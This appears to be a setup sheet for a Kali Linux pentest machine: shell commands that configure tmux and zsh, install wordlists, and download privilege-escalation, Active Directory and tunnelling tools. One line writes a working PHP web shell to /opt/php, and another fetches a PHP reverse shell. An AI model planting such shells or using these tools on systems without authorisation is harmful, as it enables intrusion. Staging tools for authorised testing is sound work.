Kali
2024.3
init
sudo apt install -y jq
sudo apt install -y lftp
sudo apt install -y whatweb
sudo apt install -y gobuster
sudo apt install -y feroxbuster
sudo apt install -y smtp-user-enum
sudo apt install -y html2text
sudo apt install -y exploitdb
#sudo apt install -y fonts-hack-ttf
#pip3 install pip --upgrade
#pip3 install setuptools --upgrade
tmux
version 1
sudo apt install tmux
echo '' > ~/.tmux.conf
echo 'set -g default-terminal "screen-256color"' > ~/.tmux.conf
echo 'set -g status-bg black' >> ~/.tmux.conf
echo 'set -g status-fg white' >> ~/.tmux.conf
echo 'set -g base-index 1' >> ~/.tmux.conf
echo 'setw -g pane-base-index 1' >> ~/.tmux.conf
echo 'PROMPT="💀%B%F{39}%d%f%b%F{8} ~ %f"' >> ~/.zshrc
source ~/.zshrc
sudo apt install tmux
cd ~
git clone https://github.com/gpakosz/.tmux.git
ln -s -f .tmux/.tmux.conf
echo "" > ~/.tmux.conf.local
echo "tmux_conf_theme_left_separator_main='\uE0B0'" >> ~/.tmux.conf.local
echo "tmux_conf_theme_left_separator_sub='\uE0B1'" >> ~/.tmux.conf.local
echo "tmux_conf_theme_right_separator_main='\uE0B2'" >> ~/.tmux.conf.local
echo "tmux_conf_theme_right_separator_sub='\uE0B3'" >> ~/.tmux.conf.local
echo "tmux_conf_theme_status_left=' 💀 #S '" >> ~/.tmux.conf.local
echo "tmux_conf_theme_status_right=\" #{prefix}#{mouse}#{pairing}#{synchronized} #(if $(/sbin/ifconfig tun0 > /dev/null 2>/dev/null); then /sbin/ifconfig tun0 | /usr/bin/grep 'inet ' | /usr/bin/cut -d ' ' -f 10 2>/dev/null; else /sbin/ifconfig eth0 | /usr/bin/grep 'inet ' | /usr/bin/cut -d ' ' -f 10 2>/dev/null; fi) , %R , %d %b | #{username}#{root} | #{hostname} | #{IP} \"" >> ~/.tmux.conf.local
echo 'PROMPT="💀%B%F{39}%d%f%b%F{8} ~ %f"' >> ~/.zshrc
source ~/.zshrc
/usr/share/wordlists
Payloads
sudo apt install -y wordlists
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
sudo apt install -y seclists
sudo ln -s /usr/share/seclists /usr/share/wordlists/seclists
# sudo wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O /usr/share/wordlists/seclists.zip && sudo unzip /usr/share/wordlists/seclists.zip && sudo rm -f /usr/share/wordlists/seclists.zip && sudo mv /usr/share/wordlists/SecLists-master /usr/share/wordlists/seclists
sudo git clone https://github.com/swisskyrepo/PayloadsAllTheThings.git /usr/share/wordlists/payloadsAllTheThings
sudo git clone https://github.com/insidetrust/statistically-likely-usernames.git /usr/share/wordlists/statistically-likely-usernames
#sudo git clone https://github.com/soffensive/windowsblindread.git /usr/share/wordlists/windowsblindread
/opt/linux
sudo chown kali:kali /opt
mkdir -p /opt/linux
echo "==========> Linux:LinPeas"
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -O /opt/linux/linux-peas.sh
chmod +x /opt/linux/linux-peas.sh
echo "==========> Linux:LinEnum"
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /opt/linux/linux-enum.sh
chmod +x /opt/linux/linux-enum.sh
echo "==========> Linux:LES (Linux Exploit Suggester)"
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O /opt/linux/linux-exploit-suggester.sh
chmod +x /opt/linux/linux-exploit-suggester.sh
echo "==========> Linux:Linux Smart Enumeration"
wget https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh -O /opt/linux/linux-smart-enum.sh
chmod +x /opt/linux/linux-smart-enum.sh
echo "==========> Linux:Linux Priv Checker"
wget https://raw.githubusercontent.com/linted/linuxprivchecker/master/linuxprivchecker.sh -O /opt/linux/linux-priv-checker.sh
chmod +x /opt/linux/linux-priv-checker.sh
echo "==========> Linux:UnixPrivescCheck"
wget https://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz -O /opt/linux/unix-privesc-check.tar.gz
tar -xf /opt/linux/unix-privesc-check.tar.gz -C /opt/linux
mv /opt/linux/unix-privesc-check-1.4/unix-privesc-check /opt/linux/unix-privesc-check.sh
rm -rf /opt/linux/unix-privesc-check-1.4
rm /opt/linux/unix-privesc-check.tar.gz
/opt/php
sudo chown kali:kali /opt
mkdir -p /opt/php
echo "==========> PHP:shell.php"
echo '<pre><?php echo shell_exec($_REQUEST["cmd"]) ?></pre>' > /opt/php/shell.php
echo "==========> PHP:r-shell.php"
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz -O /opt/php/php-reverse-shell-1.0.tar.gz
tar -xf /opt/php/php-reverse-shell-1.0.tar.gz -C /opt/php
rm /opt/php/php-reverse-shell-1.0.tar.gz
/opt/windows
sudo chown kali:kali /opt
mkdir -p /opt/windows
echo "==========> Windows:SysinternalsSuite"
wget https://download.sysinternals.com/files/SysinternalsSuite.zip -O /opt/windows/SysinternalsSuite.zip
mkdir -p /opt/windows/sysinternals
unzip /opt/windows/SysinternalsSuite.zip -d /opt/windows/sysinternals
rm /opt/windows/SysinternalsSuite.zip
echo "==========> Windows:PSTools"
wget https://download.sysinternals.com/files/PSTools.zip -O /opt/windows/PSTools.zip
unzip /opt/windows/PSTools.zip -d /opt/windows/pstools
rm /opt/windows/PSTools.zip
echo "==========> Windows:PowerSploit"
git clone https://github.com/szalek/PowerSploit.git /opt/windows/PowerSploit
echo "==========> Windows:powercat.ps1"
git clone https://github.com/besimorhino/powercat.git /opt/windows/powercat
echo "==========> Windows:Sherlock.ps1 => (too run type: Find-AllVulns)"
wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1 -O /opt/windows/Sherlock.ps1
echo "==========> Windows:WinPeas.bat"
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEAS.bat -O /opt/windows/winPEAS.bat
echo "==========> Windows:winPEASx86.exe"
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx86.exe -O /opt/windows/winPEASx86.exe
echo "==========> Windows:winPEASx64.exe"
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe -O /opt/windows/winPEASx64.exe
echo "==========> Windows:exploit-suggester"
pip3 install wesng
ln -s /home/kali/.local/bin/wes /opt/windows/windows-exploit-suggester
echo "==========> Windows:kerbrute"
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64 -O /opt/windows/kerbrute
chmod +x /opt/windows/kerbrute
sudo rm /usr/bin/kerbrute 2>/dev/null
echo "==========> Windows:kerberoast"
git clone https://github.com/nidem/kerberoast.git /opt/windows/kerberoast
echo "==========> Windows:kerberoast"
git clone https://github.com/szalek/Ghostpack-CompiledBinaries.git /opt/windows/GhostpackBinaries
echo "==========> Windows:bloodHoundPy"
wget https://github.com/fox-it/BloodHound.py/archive/refs/tags/v1.0.1.zip -O /opt/windows/bloodHoundPy.zip
unzip /opt/windows/bloodHoundPy.zip -d /opt/windows/
mv /opt/windows/BloodHound.py-1.0.1 /opt/windows/bloodHoundPy
rm /opt/windows/bloodHoundPy.zip
echo "==========> Windows:SharpHound"
wget https://github.com/BloodHoundAD/SharpHound/releases/download/v1.1.0/SharpHound-v1.1.0.zip -O /opt/windows/SharpHound.zip
unzip /opt/windows/SharpHound.zip -d /opt/windows/sharpHound
rm /opt/windows/SharpHound.zip
echo "==========> Windows:AzureHound"
wget https://github.com/BloodHoundAD/AzureHound/releases/download/v1.2.4/azurehound-linux-amd64.zip -O /opt/windows/Azurehound.zip
unzip /opt/windows/Azurehound.zip -d /opt/windows
rm /opt/windows/Azurehound.zip
echo "==========> Windows:Snaffler"
wget https://github.com/SnaffCon/Snaffler/releases/download/1.0.103/Snaffler.exe -O /opt/windows/Snaffler.exe
echo "==========> Windows:PrintSpoofer.exe"
wget https://github.com/dievus/printspoofer/raw/master/PrintSpoofer.exe -O /opt/windows/PrintSpoofer.exe
echo "==========> Windows:RoguePotato.exe"
mkdir -p /opt/windows/potato
wget https://github.com/antonioCoco/RoguePotato/releases/download/1.0/RoguePotato.zip -O /opt/windows/potato/RoguePotato.zip
unzip /opt/windows/potato/RoguePotato.zip -d /opt/windows/potato/
rm /opt/windows/potato/RoguePotato.zip
/opt/tools
# sudo rm -rf /opt/tools
# sudo rm /usr/bin/enum4linux2
sudo chown kali:kali /opt
mkdir -p /opt/tools
echo "==========> Tools:impacket"
git clone https://github.com/SecureAuthCorp/impacket.git /opt/tools/impacket
sudo pip3 install -r /opt/tools/impacket/requirements.txt
cd /opt/tools/impacket/
sudo pip3 install .
sudo python3 setup.py install
echo "==========> Tools:finger"
wget https://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz -O /opt/tools/finger-user-enum-1.0.tar.gz
tar -xvzf /opt/tools/finger-user-enum-1.0.tar.gz -C /opt/tools/
rm /opt/tools/finger-user-enum-1.0.tar.gz
echo "==========> Tools:cms:drupwn"
wget https://github.com/immunIT/drupwn/archive/refs/tags/1.0.4.tar.gz -O /opt/tools/drupwn.tar.gz
tar -xf /opt/tools/drupwn.tar.gz -C /opt/tools
rm /opt/tools/drupwn.tar.gz
cd /opt/tools/drupwn-1.0.4
sudo python3 setup.py install
echo "==========> Tools:cms:droopescan"
git clone https://github.com/droope/droopescan.git /opt/tools/droopescan
cd /opt/tools/droopescan
sudo pip3 install -r requirements.txt
echo "==========> Tools:enum2linux2"
wget https://github.com/cddmp/enum4linux-ng/archive/refs/tags/v1.3.0.tar.gz -O /opt/tools/v1.3.0.tar.gz
tar -xvzf /opt/tools/v1.3.0.tar.gz -C /opt/tools/
rm /opt/tools/v1.3.0.tar.gz
sudo ln -s /opt/tools/enum4linux-ng-1.3.0/enum4linux-ng.py /usr/bin/enum4linux2
echo "==========> Tools:chisel"
rm -rf /opt/tools/chisel/
mkdir -p /opt/tools/chisel/
wget https://github.com/jpillora/chisel/releases/download/v1.7.4/chisel_1.7.4_linux_amd64.gz -O /opt/tools/chisel/chisel.gz
gzip -d /opt/tools/chisel/chisel.gz
mv /opt/tools/chisel/chisel /opt/tools/chisel/chisel.elf
chmod +x /opt/tools/chisel/chisel.elf
wget https://github.com/jpillora/chisel/releases/download/v1.7.4/chisel_1.7.4_windows_amd64.gz -O /opt/tools/chisel/chisel.gz
gzip -d /opt/tools/chisel/chisel.gz
mv /opt/tools/chisel/chisel /opt/tools/chisel/chisel.exe
chmod +x /opt/tools/chisel/chisel.exe
Links
- Pentest Monkey: http://pentestmonkey.net
- LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
- LinEnum: https://github.com/rebootuser/LinEnum
- LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester
- Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration
- Linux Priv Checker: https://github.com/linted/linuxprivchecker
- Sysinternals Suite https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite